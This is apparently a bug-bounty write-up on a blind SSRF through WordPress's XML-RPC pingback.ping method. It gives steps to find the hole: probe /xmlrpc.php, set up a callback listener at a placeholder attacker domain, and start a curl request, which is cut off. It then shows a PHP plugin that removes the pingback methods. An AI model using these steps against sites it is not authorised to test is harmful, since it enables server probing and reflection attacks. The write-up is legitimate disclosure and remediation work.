This is a very easy P4 bug.
This bug is called BLIND SSRF VIA XMLRPC PINGBACK METHOD.
While testing the website, I discovered that the WordPress XML-RPC endpoint (/xmlrpc.php) is exposed and accepts unauthenticated pingback.ping requests. This allows an attacker to force the server to initiate outbound HTTP requests to attacker-controlled domains.
This creates a blind Server-Side Request Forgery (SSRF) primitive. The attacker can use this behaviour to:
- Discover the origin IP and network position of the server
- Potentially scan/reach internal hosts (private IP ranges)
- Abuse the site as a DDoS reflector toward any external victim
How to find it:
- Visit https://www.redacted.com/xmlrpc.php and check whether it is accessible. If it is blocked, the server returns 403 FORBIDDEN; if it is open, you will see something like this:
- Prepare an out-of-band listener (Burp Collaborator / Interactsh)
- Capture its unique callback URL (e.g., http://<attacker-domain>.oast.me)
- Send the request:

```shell
curl -s -H "Content-Type: text/xml" \
--data '<?xml…
```
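On the fixing side, the usual remediation is to strip the pingback methods from the XML-RPC server so pingback.ping is no longer callable. The following must-use plugin is an added example written for this post, not code from the original report; it assumes a standard WordPress install where the file is dropped into wp-content/mu-plugins/.

```php
<?php
/**
 * Plugin Name: Disable XML-RPC pingbacks
 * Description: Removes the pingback methods that provide the blind SSRF
 *              primitive described above, while leaving the rest of
 *              XML-RPC available for clients that still need it.
 * Assumed install path: wp-content/mu-plugins/disable-pingbacks.php
 */

// The xmlrpc_methods filter runs when wp_xmlrpc_server builds its method
// table, so removing entries here makes them unreachable for every caller.
add_filter( 'xmlrpc_methods', function ( array $methods ): array {
    unset( $methods['pingback.ping'] );
    unset( $methods['pingback.extensions.getPingbacks'] );
    return $methods;
} );

// Stop advertising the endpoint: WordPress adds an X-Pingback header to
// normal page responses, which is how scanners spot the pingback surface.
add_filter( 'wp_headers', function ( array $headers ): array {
    unset( $headers['X-Pingback'] );
    return $headers;
} );

// Caveat: the well-known "disable XML-RPC" one-liner below is NOT enough
// on its own. xmlrpc_enabled only gates methods that require a login;
// pingback.ping is unauthenticated and stays callable unless removed
// from the method table as above.
// add_filter( 'xmlrpc_enabled', '__return_false' );
```

After deploying, calling system.listMethods against /xmlrpc.php should no longer list pingback.ping; if it still does, a caching layer or another plugin is re-adding the method.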